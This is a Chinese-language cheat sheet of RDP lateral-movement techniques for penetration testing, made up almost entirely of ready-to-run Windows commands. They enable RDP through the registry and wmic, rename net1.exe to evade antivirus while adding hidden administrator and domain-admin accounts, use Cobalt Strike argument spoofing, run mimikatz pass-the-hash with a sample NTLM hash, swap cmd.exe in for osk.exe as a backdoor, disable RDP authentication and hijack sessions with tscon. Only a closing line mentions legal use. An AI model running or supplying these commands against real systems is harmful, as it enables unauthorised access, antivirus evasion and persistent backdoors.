横向渗透中RDP攻击技巧全面总结

1. 查询开放的端口

在横向渗透过程中，了解目标主机开放的端口是至关重要的。有时候，远程桌面端口默认的3389可能会被修改。以下是查询开放端口的方法：

1.1 获取远程桌面服务进程ID

<code>tasklist /svc | findstr TermService #获取远程桌面进程号</code>

远程登录查看目标进程，需要知道账户与密码：

<code>tasklist /S 172.16.1.15 /U administrator -P Lims@1234 /svc | findstr TermService</code>

如果查询不到，可能目标没有开启远程桌面服务。

1.2 通过PID获取端口

<code>netstat -ano | findstr 512 #查看进程ID为512开放的端口</code>

2. 开启允许远程连接

方法1：

<code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</code>

方法2：

<code>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code>

方法3：（适用于Windows 7、8、10，Server 2008、2012、2016）

<code>wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1</code>

方法4：（适用于Windows XP、Server 2003）

<code>wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1</code>

3. 添加用户

3.1 绕过杀软操作

3.1.1 添加隐藏管理员用户

<code>copy C:\Windows\System32\net1.exe test.txt test.txt user #若有回显则绕过成功 test.txt user test$ Test360. /add test.txt localgroup administrators test$ /add</code>

3.1.2 激活游客用户，添加管理员

<code>copy C:\Windows\System32\net1.exe test.txt test.txt user guest /active:yes test.txt user guest Test360. #设置密码 test.txt localgroup administrators guest /add</code>

3.1.3 激活超级管理员用户

<code>copy C:\Windows\System32\net1.exe test.txt test.txt user administrator /active:yes test.txt user administrator Test360. #设置密码</code>

3.1.4 添加域管理员

<code>copy C:\Windows\System32\net1.exe test.txt 添加域用户 test.txt user test$ Test360. /add /domain 添加域用户为域管理员组 test.txt group "Domain Admins" test$ /add</code>

3.2 绕过数字添加用户

使用Cobalt Strike自带的参数污染创建用户。

3.2.1 创建参数污染

<code>argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</code>

3.2.2 创建用户

<code>execute net1 user test$ Test360. /add execute net1 localgroup administrators test$ /add</code>

4. NTLM传递登录

使用mimikatz进行pth，打开mstsc。需要管理员权限运行mimikatz。

<code>sekurlsa::pth /user:administrator /ntlm:3766c17d09689c438a072a33270cb6f5 /domain:dome "/run:mstsc.exe /restrictedadmin /v:192.168.1.1"</code>

5. 权限维持-屏幕键盘后门

5.1 修改cmd.exe为osk.exe

<code>move C:\Windows\System32\osk.exe C:\Windows\System32\osk1.exe copy C:\Windows\System32\cmd.exe C:\Windows\System32\osk.exe</code>

5.2 设置建立RDP连接时不进行身份验证

<code>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f</code>

6. 桌面会话切换，免密登录

<code>psexec.exe -i -s cmd query session tscon id</code>

7. 影子账户

7.1 制作隐藏用户

<code>net user test$ Aa136. /add net localgroup administrators test$ /add</code>

7.2 修改注册表隐藏

<code>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f</code>

这些技巧可以帮助渗透测试人员深入横向渗透，获取更多的权限和信息。但在实际操作中，请务必遵循法律法规，仅用于合法的安全测试目的。